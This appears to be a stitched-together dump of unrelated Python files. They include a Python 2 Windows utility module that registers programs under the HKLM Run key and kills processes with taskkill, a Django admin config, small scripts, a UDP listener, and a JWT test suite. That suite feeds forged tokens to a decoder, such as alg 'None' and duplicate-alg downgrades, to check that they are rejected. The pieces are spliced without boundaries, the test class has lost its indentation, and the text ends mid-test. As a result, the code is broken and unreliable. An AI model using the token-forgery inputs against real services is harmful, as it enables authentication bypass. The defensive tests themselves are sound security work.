        if asc >= -12838 and asc <= -12557:
            return 'w'
        if asc >= -12556 and asc <= -11848:
            return 'x'
        if asc >= -11847 and asc <= -11056:
            return 'y'
        if asc >= -11055 and asc <= -10247:
            return 'z'
        return ''
class Logger:
    """Tiny fan-out logger: formats a line and forwards it to all handlers."""
    def __init__(self):
        self.handlers=[]
        self.dumpEnabled = False # logging output is disabled by default
        # presence of a 'logdump.yes' marker file in the cwd enables output
        if os.path.exists('logdump.yes'):
            self.dumpEnabled = True
    # lazily-created singleton instance (name-mangled class attribute)
    __handle = None
    @staticmethod
    def instance():
        """Return the process-wide Logger singleton."""
        if not Logger.__handle:
            Logger.__handle = Logger()
        return Logger.__handle
    def addHandler(self,h):
        # h: any object with a write(str) method (see the handler classes below)
        self.handlers.append(h)
    def info(self,s):
        self.write(s,'INFO')
    def error(self,s):
        self.write(s,'ERROR')
    def debug(self,s):
        self.write(s)
    def write(self,s,level='DEBUG'):
        """Prefix *s* with timestamp + level and forward it to every handler."""
        if not self.dumpEnabled:
            return
        import time
        if not s.strip():
            return
        stime = formatTimestamp(int(time.time()))
        s = stime + ' %s '%level + s
        for h in self.handlers:
            try:
                h.write(s)
            except:
                traceback.print_exc()
    def writelines(self,text,level='DEBUG'):
        #text = text.strip()
        self.write(text+'\n',level)
class StdoutHandler:
    """Log sink that appends a newline and writes to a stream (e.g. sys.stdout)."""
    def __init__(self, stdout=None):
        self.stdout = stdout
    def write(self, s):
        if not self.stdout:
            return  # no stream configured -> silently drop
        try:
            self.stdout.write(s + '\n')
        except:
            # Python 2 fallback for streams that reject unicode
            self.stdout.write(s.encode('gbk') + '\n')
class FileHandler:
    """Log sink appending lines to a file, opened lazily on first write."""
    def __init__(self, file, mode='a+'):
        self.file = file
        self.mode = mode
        self.hfile = None  # opened on first write()
    def write(self, s):
        if self.hfile is None:
            self.hfile = open(self.file, self.mode)
        if not self.hfile:
            return
        try:
            self.hfile.write(s + '\n')
        except:
            # Python 2 fallback for unicode payloads
            self.hfile.write(s.encode('gbk') + '\n')
        self.hfile.flush()
class DatagramHandler:
    """Log sink sending each line as a UDP datagram to *dest*."""
    def __init__(self,dest=('127.0.0.1',17948)):
        self.dest = dest
        self.sock = None  # created lazily on first write
    def write(self,s):
        import socket
        if not self.sock:
            self.sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
        try:
            self.sock.sendto(s,0,self.dest)
        except:
            # Python 2 fallback: encode unicode payloads as gbk bytes
            self.sock.sendto(s.encode('gbk'),0,self.dest)
def setAutoRunWithOsStart(key,app,start=True):
    """Register (or remove, when start=False) *app* under the HKLM Run key.

    Python 2 / Windows only (_winreg). Writing HKLM requires admin rights;
    failures are printed and swallowed.
    """
    import _winreg
    try:
        r = _winreg.OpenKey(
            _winreg.HKEY_LOCAL_MACHINE,
            r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE)
        if start:
            _winreg.SetValueEx(r,key,0,_winreg.REG_SZ,app)
        else:
            _winreg.DeleteValue(r,key)
    except:
        traceback.print_exc()
def getRegisterValueInAutoRun(key='audioTerm'):
    """Return the command registered under *key* in the HKLM Run key, or None."""
    import _winreg
    try:
        r = _winreg.OpenKey(
            _winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
        p1,num,p3 = _winreg.QueryInfoKey(r)
        # linear scan over all values under the Run key
        for n in range(num):
            p1,p2,p3 = _winreg.EnumValue(r,n)
            if p1 == key:
                return p2
    except:
        traceback.print_exc()
    return None
def killProcess(pid):
    """Force-kill process *pid* and its child tree via Windows taskkill.

    NOTE(review): shell=True with a formatted command; tolerable here only
    because %i forces pid to an integer - do not widen to string input.
    """
    import subprocess
    # handle = subprocess.Popen("", shell=False)
    subprocess.Popen("taskkill /F /T /PID %i"%pid , shell=True)
class Win32:
    """Small helpers around the win32 message pump (Windows only)."""
    @staticmethod
    def dispatchMessage(winid):
        # Non-blocking peek; pump at most one pending window message for *winid*.
        import win32api,win32gui,win32con
        status, msg = win32gui.PeekMessage(winid,0,0,win32con.PM_NOREMOVE)
        if not msg[0] == 0:
            b,msg = win32gui.GetMessage(winid,0,0)
            if msg:
                win32gui.TranslateMessage(msg)
                win32gui.DispatchMessage(msg)
def loadValuesFromFile(filename):
    """Read the unique, non-empty stripped lines of *filename*; empty view on error."""
    seen = {}
    try:
        handle = open(filename)
        lines = handle.readlines()
        handle.close()
        for raw in lines:
            raw = raw.strip()
            if raw:
                seen[raw] = None  # dict used as an ordered set
    except:
        seen = {}
    return seen.keys()
def saveValuesToFile(filename, values):
    """Write one value per line to *filename*; True on success, False on error."""
    try:
        out = open(filename, 'w')
        for val in values:
            out.write(val + '\n')
        out.close()
    except:
        return False
    return True
def normalizeString(s):
    """Coerce falsy values (None, '', 0, ...) to the empty string; pass others through."""
    return s if s else ''
def genUUID():
    # Random UUID4 as a 32-char hex string (no dashes).
    return uuid.uuid4().hex
def encodeBase64(s):
    """Base64-encode *s* ('' passes through).

    NOTE(review): base64.encodestring is Python 2 API; it was deprecated
    and removed in Python 3.9 (encodebytes is the replacement). Internal
    newlines remain for inputs > 57 bytes - callers may rely on that.
    """
    if not s:
        return ''
    return base64.encodestring(s).strip()
def decodeBase64(s):
    """Inverse of encodeBase64 ('' passes through); decodestring is also Python 2 API."""
    if not s:
        return ''
    return base64.decodestring(s)
def random_password(size=6):
    """Return *size* random characters drawn from A-Z and 0-9.

    Security fix: passwords must not come from the default Mersenne-Twister
    random generator; random.SystemRandom (os.urandom-backed, available on
    both Python 2 and 3) is used instead. Interface is unchanged.
    """
    import string, random
    rng = random.SystemRandom()
    alphabet = string.ascii_uppercase + string.digits
    return ''.join(rng.choice(alphabet) for _ in range(size))
if __name__=='__main__':
    # Ad-hoc manual test area (Python 2 print statements); most calls are
    # kept commented out for reference.
    #print loadjson('node.txt')
    #print statevfs('d:/temp4/')
    #print getfiledigest('D:/test_dvr_data/stosync/file0014.trp')
    #print readImageTimes(u'P:/20120523/沪EN3870/1-2/DCIM/100MEDIA/FILE0006.MOV'.encode('gbk'))
    # print SimpleConfig().load('system.conf').get('inv_cancel_mode')
    # u,all = statevfs('c:/temp')
    # print u/1024/1024/1024,all/1024/1024/1024
    #print sc.props
    #setAutoRunWithOsStart('audioTerm',r'c:\abc.exe',True)
    r = getRegisterValueInAutoRun('audioTerm')
    print repr(r)
|
from django.contrib import admin
from .models import User, Organisation, UserOrganisation
# Register your models here.
# Customise the header shown at the top of every admin page.
admin.site.site_header = 'Orange Track'
class UserOrganisationAdmin(admin.ModelAdmin):
    """Admin config for user<->organisation membership rows (with admin flag)."""
    search_fields = ['organization']
    list_display = ('organization', 'user', 'is_admin')
    fields = ('organization', 'user', 'is_admin')
    list_filter = ('user',)
class OrganisationAdmin(admin.ModelAdmin):
    """Admin list/search/edit configuration for Organisation records."""
    search_fields = ['title']
    list_display = ('title', 'brand', 'email', 'phone', 'website')
    fields = ('title', 'brand', 'email', 'phone', 'website')
class UserAdmin(admin.ModelAdmin):
    """Admin configuration for User records (filterable by user_type)."""
    search_fields = ['nick_name', 'email']
    list_display = ('nick_name', 'email', 'phone', 'user_type')
    fields = ('nick_name', 'email', 'street', 'city', 'state', 'zip_code', 'phone', 'user_type')
    list_filter = ('user_type',)
# Expose the three models in the Django admin with the configs above.
admin.site.register(User, UserAdmin)
admin.site.register(Organisation, OrganisationAdmin)
admin.site.register(UserOrganisation, UserOrganisationAdmin)
|
# Read two integers N and M from stdin and print the computed total.
n, m = (int(tok) for tok in input().split())
total = ((n - m) * 100 + m * 1900) * 2 ** m
print(total)
|
from distutils.core import setup, Extension
import os
import numpy as np
def numpy_include():
    """Return NumPy's C header directory, falling back to the legacy API name."""
    try:
        return np.get_include()
    except AttributeError:
        # very old numpy releases only exposed get_numpy_include()
        return np.get_numpy_include()
# Resolve the NumPy include directory and the source root once at import.
np_inc = numpy_include()
script_root = os.path.dirname(os.path.realpath(__file__))
src_root = f'{script_root}/geogrid/src/'
# C extension bundling the geogrid read/write helpers with their wrapper
# (presumably SWIG-generated, judging by the *_wrap.c naming - confirm).
extensions = [
    Extension('_python_geogrid', [src_root+'python_geogrid_wrap.c', src_root+'write_geogrid.c', src_root+'read_geogrid.c'], include_dirs=[np_inc])]
setup(name = 'python_geogrid',
      version = "1.0",
      ext_modules = extensions,
      py_modules = ['python_geogrid'],
      package_dir = {'' : 'geogrid/src'}
      )
# Generated by Django 2.0.1 on 2018-02-20 07:55
from django.db import migrations
class Migration(migrations.Migration):
    # Renames the misspelled Planning.recruting_number field to recruiting_number.
    dependencies = [
        ('PlanningBoard', '0024_merge_20180218_2012'),
    ]
    operations = [
        migrations.RenameField(
            model_name='planning',
            old_name='recruting_number',
            new_name='recruiting_number',
        ),
    ]
|
#!/usr/bin/python
import socket
import sys
UDP_IP = '127.0.0.1'
UDP_PORT = 1737

# Listen for UDP datagrams on localhost and stream their payloads to stdout.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    s.bind((UDP_IP, UDP_PORT))
    while 1:
        data = s.recv(1024)
        # NOTE(review): assumes Python 2 where recv() returns str; on
        # Python 3 this would need sys.stdout.buffer.write(data)
        sys.stdout.write(data)
finally:
    # bug fix: the original called conn.close() on an undefined name;
    # close the socket we actually opened
    s.close()
|
from .create_invite import CreateInviteController
from ..usecases import create_invite_usecase
# Module-level singleton: wire the controller to its use case at import time.
create_invite_controller = CreateInviteController(create_invite_usecase)
|
from setuptools import setup
# Package metadata for the Flask-FirebaseAuth extension.
setup(
    name='Flask-FirebaseAuth',
    version='0.1.1',
    description='Google Firebase Authentication integration for Flask',
    packages=['flask_firebaseauth'],
    include_package_data=True,
    install_requires=[
        'Flask>=0.11',
        'PyJWT>=1.4',
        'cryptography>=1.6',
        'requests>=2.12',
    ])
|
# input
# Start from the base fruit list, drop 'grapes', merge in the new fruits,
# then sort alphabetically and show the result.
L = ['mango', 'grapes', 'banana', 'apple']
L.remove('grapes')
L1 = ['cherries', 'gauva', 'melon']
L.extend(L1)
L.sort()
print(L)
# expected output: ['apple', 'banana', 'cherries', 'gauva', 'mango', 'melon']
|
import numpy as np
class Prediction:
    """Looks up precomputed Q-values for 3x3 board states and picks moves.

    NOTE(review): presumably an 8-puzzle-style sliding board - n=3 with
    value 9 (self.bk) marking the blank tile; confirm against the trainer
    that produced q_tab_9.npz.
    """
    def __init__(self):
        self.n = 3                 # board side length
        self.N = self.n * self.n   # number of cells
        self.bk = 9                # value marking the blank cell
        table = np.load('./q_tab_9.npz')
        # build the Q table: state-string -> value
        self.q_tab = dict(zip(table['k'], table['v']))
        # row/column offsets for the four candidate moves
        self.X = [-1, 0, 1, 0]
        self.Y = [0, -1, 0, 1]

    def pre_step(self, x):
        """Predicted step count for state *x* (any shape), or -1 if unknown."""
        flat = x.reshape(1, -1)
        key = ''.join(str(flat[0, i]) for i in range(self.N))
        return self.q_tab.get(key, -1)

    def pre_next(self, sta, bk_x, bk_y):
        """Try each legal move of the blank at (bk_x, bk_y) on board *sta*
        and return the direction index with the smallest predicted steps."""
        step = [10000, 10000, 10000, 10000]
        for i in np.random.permutation(4):  # random order of 0..3
            nx = bk_x + self.X[i]
            ny = bk_y + self.Y[i]
            if nx < 0 or nx >= self.n or ny < 0 or ny >= self.n:
                continue
            # swap the blank into (nx, ny), score the state, then swap back
            moved = sta[nx][ny]
            sta[nx][ny] = self.bk
            sta[bk_x][bk_y] = moved
            step[i] = self.pre_step(sta)
            sta[nx][ny] = moved
            sta[bk_x][bk_y] = self.bk
        return np.argmin(step)
import base64
import os
import json
import pytest
from sdc.crypto.exceptions import InvalidTokenException
from sdc.crypto.jwt_helper import JWTHelper
from sdc.crypto.key_store import KeyStore
from tests import TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM, TEST_DO_NOT_USE_SR_PRIVATE_PEM, \
TEST_DO_NOT_USE_UPSTREAM_PRIVATE_KEY, TEST_DO_NOT_USE_SR_PUBLIC_KEY, TEST_DO_NOT_USE_EQ_PRIVATE_KEY, \
TEST_DO_NOT_USE_EQ_PUBLIC_KEY
# Key purpose used throughout the KeyStore fixtures below.
KEY_PURPOSE_AUTHENTICATION = "authentication"
# jwt.io public key signed
TEST_DO_NOT_USE_PUBLIC_KEY = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3Wojg
GHFHYLugdUWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlv
dbH6dvEOfou0/gCFQsHUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GU
nKHkkle+Q0pX/g6jXZ7r1/xAK5Do2kQ+X5xK9cipRgEKwIDAQAB
-----END PUBLIC KEY-----"""
# Pre-built JWT pieces (header.payload.signature); the tests below splice in
# malformed replacements for individual parts.
jwtio_header = "eyJraWQiOiI3MDllYjQyY2ZlZTU1NzAwNThjZTA3MTFmNzMwYmZiYjdkNGM4YWRlIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJqd3" \
               "QifQ"
jwtio_payload = "eyJ1c2VyIjoiamltbXkiLCJpYXQiOjE0OTgxMzc1MTkuMTM1NDc5LCJleHAiOjEuMDAwMDAwMDAwMDAxNDk4MmUrMjF9"
jwtio_signature = "tXGcIZf" \
                  "bTIgxrd7ILj_XqcoiRLtmgjnJ0WORPBJ4M9Kd3zKTBkoIM6pN5XWdqsfvdby53mxQzi3_" \
                  "DZS4Ab4XvF29Wce49GVv7k69ZZJ-5g2NX9iJy4_Be8uTZNKSwMpfrnkRrsbaWAGrXe9NKC3WC_Iq4UuE3KM7ltvOae4be-2" \
                  "863DP7_QEUtaAtXSwUkjPcgkvMPns-SurtFNXgFFVToNnwIuJ9UWsY8JlX1UB56wfqu68hbl88" \
                  "lenIf9Ym0r5hq0DlOZYNtjVizVDFciRx_52d4oeKMSzwJ1jB5aZ7YKRNHTo38Kltb5FkHRcIkV1Ae68-5dZeE9Yu_JHPMi_hw"
# A fully valid signed token assembled from the pieces above.
jwtio_signed = jwtio_header + "." + jwtio_payload + "." + jwtio_signature
class TestTokenHelper:
CHECK_CLAIMS = {
"exp": None,
"iat": None,
}
key_store = KeyStore({
"keys": {
"e19091072f920cbf3ca9f436ceba309e7d814a62": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'private',
'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM,
'service': 'some-service'},
"EQ_USER_AUTHENTICATION_SR_PRIVATE_KEY": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'private',
'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM,
'service': 'some-service'},
"EDCRRM": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'public',
'value': TEST_DO_NOT_USE_PUBLIC_KEY,
'service': 'some-service'},
"709eb42cfee5570058ce0711f730bfbb7d4c8ade": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'public',
'value': TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM,
'service': 'some-service'},
"EQ_USER_AUTHENTICATION_EQ_KEY": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'private',
'value': TEST_DO_NOT_USE_EQ_PRIVATE_KEY,
'service': 'some-service'},
}
})
key_store_secondary = KeyStore({
"keys": {
"EQ_USER_AUTHENTICATION_EQ_KEY": {'purpose': KEY_PURPOSE_AUTHENTICATION,
'type': 'public',
'value': TEST_DO_NOT_USE_EQ_PUBLIC_KEY,
'service': 'some-service'},
}
})
kid = "e19091072f920cbf3ca9f436ceba309e7d814a62"
encoder_args = (
TEST_DO_NOT_USE_UPSTREAM_PRIVATE_KEY,
TEST_DO_NOT_USE_SR_PUBLIC_KEY
)
    def test_jwt_io(self):
        """A well-formed signed token decodes and exposes its claims."""
        token = JWTHelper.decode(jwtio_signed, self.key_store, purpose=KEY_PURPOSE_AUTHENTICATION,
                                 leeway=100, check_claims=self.CHECK_CLAIMS)
        assert token.get("user") == "jimmy"
    def test_does_not_contain_two_instances_of_full_stop(self):
        """Removing one of the two dot separators must be rejected."""
        jwe = jwtio_signed.replace('.', '', 1)
        self.assert_in_decode_signed_jwt_exception(jwe, "Invalid Header")
    def test_jwt_contains_empty_header(self):
        """An empty JSON header ('e30' == '{}') has no kid and must fail."""
        token_without_header = "e30." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(token_without_header, "Missing kid")
    def test_jwt_does_not_contain_header_at_all(self):
        """A token starting with '.' has no header section at all."""
        token_without_header = "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(token_without_header, "Missing Headers")
    def test_jwt_contains_empty_payload(self):
        """Swapping in an empty payload invalidates the signature."""
        token_without_payload = jwtio_header + ".e30." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(token_without_payload, "InvalidJWSSignature")
    def test_jwt_does_not_contain_payload(self):
        """A missing payload section invalidates the signature."""
        token_without_payload = jwtio_header + ".." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(token_without_payload, "InvalidJWSSignature")
    def test_jwt_does_not_contain_signature(self):
        """Replacing the signature with junk invalidates it."""
        jwt = jwtio_header + "." + jwtio_payload + ".e30"
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_jose_header_missing_type(self):
        """Header without 'typ' no longer matches the signed header -> bad signature."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"EDCRRM"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_jose_header_invalid_type(self):
        """Header with a bogus 'typ' value must be rejected."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"EDCRRM", "typ":"TEST"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_jose_header_contains_multiple_type(self):
        """Duplicate 'typ' keys in the header must be rejected."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"EDCRRM","typ":"JWT","typ":"TEST"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_jose_header_missing_alg(self):
        """Header without an 'alg' entry must be rejected."""
        header = base64.urlsafe_b64encode(b'{"kid":"EDCRRM","typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "No \"alg\" in headers")
    def test_jose_header_invalid_alg(self):
        """An unknown algorithm name must not be allowed."""
        header = base64.urlsafe_b64encode(b'{"alg":"invalid","kid":"EDCRRM","typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "Algorithm not allowed")
    def test_jose_header_none_alg(self):
        """The classic alg='None' downgrade attack must be blocked."""
        header = base64.urlsafe_b64encode(b'{"alg":"None","kid":"EDCRRM","typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "Algorithm not allowed")
    def test_jose_header_contains_multiple_alg(self):
        """Duplicate 'alg' keys (last one HS256) must be blocked."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "alg":"HS256","kid":"EDCRRM", "typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "Algorithm not allowed")
    def test_jose_header_missing_kid(self):
        """A header with no key id cannot select a verification key."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "Missing kid")
    def test_jose_header_contains_multiple_kid(self):
        """Duplicate 'kid' keys must be rejected."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"test", "kid":"EDCRRM", "typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_jose_header_contains_invalid_kid(self):
        """A kid not present in the key store must be rejected."""
        header = base64.urlsafe_b64encode(b'{"alg":"RS256", "kid":"UNKNOWN", "typ":"JWT"}')
        jwt = header.decode() + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "Invalid public Key Identifier")
    def test_signature_not_2048_bits(self):
        """A random 255-byte signature (wrong length for the key) must fail."""
        jwt = jwtio_header + "." + jwtio_payload + "." + base64.urlsafe_b64encode(os.urandom(255)).decode()
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_payload_corrupt(self):
        """Garbage in place of the payload invalidates the signature."""
        jwt = jwtio_header + ".asdasd." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_header_corrupt(self):
        """Garbage in place of the header must be rejected as an invalid header."""
        jwt = "asdsadsa" + "." + jwtio_payload + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "Invalid Header")
    def test_signature_corrupt(self):
        """Garbage in place of the signature must be rejected."""
        jwt = jwtio_header + "." + jwtio_payload + ".asdasddas"
        self.assert_in_decode_signed_jwt_exception(jwt, "Invalid JWS Object")
    def test_payload_contains_malformed_json(self):
        """A payload that is not valid JSON invalidates the signature check."""
        payload = base64.urlsafe_b64encode(b'{"user":"jimmy,"iat": "1454935765","exp": "2075297148"')
        jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
    def test_payload_contains_corrupted_json(self):
        """Valid JSON followed by trailing garbage must also fail."""
        payload = base64.urlsafe_b64encode(b'{"user":"jimmy","iat": "1454935765","exp": "2075297148"}ABDCE')
        jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
        self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_payload_does_not_contain_exp(self):
valid_token_no_exp = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkVEQ1JSTSJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm" \
"FtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6IjE0NTQ5MzU3NjcifQ.VupTBEOEzeDjxd37PQ34xv" \
"BlLzeGTA0xFdGnLZDcnxAS1AjNcJ66edRmr4tmPIXnD6Mgen3HSB36xuXSnfzPld2msFHUXmB18CoaJQK19BXEY" \
"vosrBPzc1ohSvam_DgXCzdSMAcWSE63e6LTWNCT93-npD3p9tjdY_TWpEOOg14"
self.assert_in_decode_signed_jwt_exception(valid_token_no_exp, "Claim exp is missing")
    def test_payload_does_not_contain_iat(self):
        # Correctly signed token whose payload omits the `iat` claim;
        # the literal must stay byte-identical so the embedded signature remains valid.
        valid_token_no_iat = "eyJhbGciOiJSUzI1NiIsImtpZCI6IjcwOWViNDJjZmVlNTU3MDA1OGNlMDcxMWY3MzBiZmJiN2Q0YzhhZGUiLCJ" \
                             "0eXAiOiJqd3QifQ.eyJlcV9pZCI6IjEiLCJleHAiOjIwNzcxODg5MDksImZvcm1fdHlwZSI6IjAyMDUiLCJqdGk" \
                             "iOiIzMmIxNDdjNS04OWEzLTQxMzUtYjgxMy02YzQzNTE1Yzk3MTkifQ.lPTbkzQhrktcRCgn2-ku4eqr5zpgetn" \
                             "I8JjipBsm3WrxALnnQc4QebtsPIP9vxv9cRLkis6FMZa3Lm6A5fVAHwsCKMOsDjBFf3QXVtLIgRMW-Q8VNowj5F" \
                             "UW5TAQhRAka-Og9lI3gTpcN-ynhnb0arlGKhbzJU03K0KEBPTT6TDRUeKZAUTAA29qxmPIVbhuQNAjmHX7uSW4z" \
                             "_OKLi1OdIlFEvC6X5rddkfv2yhGDNpO4ZfUcHvcfCgyg16WQDSBKVLQf2uk8-Ju_zOv4818Obb12N7CJvAb5eys" \
                             "vnW3MSbAQhvvJJYe8WCN7j1uHZxRpwIPgAGvGiN9Sa1Gq14EWA"
        self.assert_in_decode_signed_jwt_exception(valid_token_no_iat, "Claim iat is missing")
    def test_payload_invalid_exp(self):
        # Signed token whose `exp` claim is the non-numeric string "?";
        # decode must report that exp is not an integer.
        valid_token_with_invalid_exp = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkVEQ1JSTSJ9.eyJzdWIiOiIxMjM0NTY3" \
                                       "ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6IjE0NTQ5MzU3NjUiLCJle" \
                                       "HAiOiI_In0.0ApxEXw1rzo21XQo8WgcPvnz0e8QnT0GaoXVbCj-OdJtB7GArPzaiQ1cU53WaJsvGE" \
                                       "zHTczc6Y0xN7WzcTdcXN8Yjenf4VqoiYc6_FXGJ1s9Brd0JOFPyVipTFxPoWvYTWLXE-CAEpXrEb3" \
                                       "0kB3nRjHFV_yVhLiiZUU-gpUHqNQ"
        self.assert_in_decode_signed_jwt_exception(valid_token_with_invalid_exp, "Claim exp is not an integer")
    def test_payload_invalid_iat(self):
        # Signed token whose `iat` claim is the non-numeric string "a";
        # decode must report that iat is not an integer.
        valid_token_with_invalid_iat = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkVEQ1JSTSJ9.eyJzdWIiOiIxMjM0NTY3" \
                                       "ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6ImEiLCJleHAiOiIyMDc1M" \
                                       "jk3MTQ4In0.1NIuxcD1FsZlU17NxK4UHdCfzl7qTV03qEaTRcqTC6A1Fs2Alc7mSQgkF_SpUw4Ylt" \
                                       "n-7DhO2InfcwDA0VhxBOHDL6ZzcEvzw-49iD-AaSd4aINIkDK-Iim5uzbKzgQCuZqSXFqxsZlezA4" \
                                       "BtwV7Lv2puqdPrXT8k3SvM2rOwRw"
        self.assert_in_decode_signed_jwt_exception(valid_token_with_invalid_iat, "Claim iat is not an integer")
    def test_payload_expired_exp(self):
        # Signed token whose `exp` (1498654396) is in the past; decode must
        # reject it with an "Expired at" error.
        valid_token_with_exp_in_the_past = "eyJraWQiOiI3MDllYjQyY2ZlZTU1NzAwNThjZTA3MTFmNzMwYmZiYjdkNGM4YWRlIiwidHlwI" \
                                           "joiand0IiwiYWxnIjoiUlMyNTYifQ.eyJpYXQiOjE0OTg2NTQzOTcuMDgxOTE1LCJlcV9pZCI" \
                                           "6IjEiLCJmb3JtX3R5cGUiOiIwMjA1IiwiZXhwIjoxNDk4NjU0Mzk2LjA4MTkxNSwianRpIjoi" \
                                           "NzZlNjllYTAtZWRlYi00NGY5LThkYWEtY2Q1ZDQzNzg5YmM1In0.CKWYyIcDbZaUXvdDno2B3" \
                                           "0w599_VXqicKkVjoeF4kNxc8aUcc_6J-rxTI8OU0OEoy8ywUTMBwYQnCHAuleBUYcmE9oNaHA" \
                                           "HHbfvTRVDpi1rIFc3vnoy37hx7v-iRElNJ_CNrGw5aURZ_eFarH2EiSNf7tdIy8H1xn0GnHMB" \
                                           "3-fmFylj9wvNR4td5MteAAeZlvsRf4uPj2GCm44re-n4iRY9z3ocZcKvUYVIJFOEK3XUerUdy" \
                                           "zZBGqbf-uIPB615nJgZF0PPS6e85VzrmyLD54fqrDrSnklKhu4dfMf_YdbegWvi7lUv7z_QIH" \
                                           "PRlUgxPsWKmV2G1SeVKRqbx1n_raA"
        self.assert_in_decode_signed_jwt_exception(valid_token_with_exp_in_the_past, "Expired at")
    def test_payload_exp_less_than_iat(self):
        # Signed token where exp (1498650613) precedes iat (1498654213);
        # such a token is already expired relative to issuance.
        valid_token_with_exp_less_than_iat = "eyJraWQiOiI3MDllYjQyY2ZlZTU1NzAwNThjZTA3MTFmNzMwYmZiYjdkNGM4YWRlIiwiYW" \
                                             "xnIjoiUlMyNTYiLCJ0eXAiOiJqd3QifQ.eyJmb3JtX3R5cGUiOiIwMjA1IiwiaWF0IjoxNDk" \
                                             "4NjU0MjEzLjk5NjQ2MywianRpIjoiNWFkODdjMGQtZjZlOC00MDEyLWEyM2UtMjc4MzY4YjF" \
                                             "kZmFmIiwiZXFfaWQiOiIxIiwiZXhwIjoxNDk4NjUwNjEzLjk5NjQ2M30.kAAO0uZG02sTJpQ" \
                                             "DzUFkIU7UGR9ulJV6idZJsWkJcsIu4G1JHfCoyNCzJr9xT8RRPbUrgkdVkuLD0gzOnD0Ylqj" \
                                             "xKxpoRTVUtD4p2l-5FuXcqIpy6jtQWsx1YGvMfdCRwsvpVVAUiFAhSddC0QRHvqweet7WgMq" \
                                             "SAvNz6zkOTVvW5ChjrK3IaGOAl3T6jWFN1xJCHcdlMef6S8t3ECP5NaP5HRnRxiVmV63x_RR" \
                                             "uSBwLbz_IMHUPPe6JcMRTMnzL8qM2Kwg227mHlmQhn3OMjagzraZZeQ4aedghalYoItZE80d" \
                                             "AcfDWs8DPJPqhJ0JGdA08A7ningHV67LRm6zkYw"
        self.assert_in_decode_signed_jwt_exception(valid_token_with_exp_less_than_iat, "Expired at")
def test_payload_contains_more_than_one_iat(self):
payload = base64.urlsafe_b64encode(b'{"user":"jimmy",'
b'"iat": "1454935765",'
b'"iat": "1454935765",'
b'"exp": "2075297148"}')
jwt = jwtio_header + "." + payload.decode() + "." + jwtio_signature
self.assert_in_decode_signed_jwt_exception(jwt, "InvalidJWSSignature")
def test_payload_contains_more_than_one_exp(self):
payload = base64.urlsafe_b64encode(b'{"user":"jimmy",'
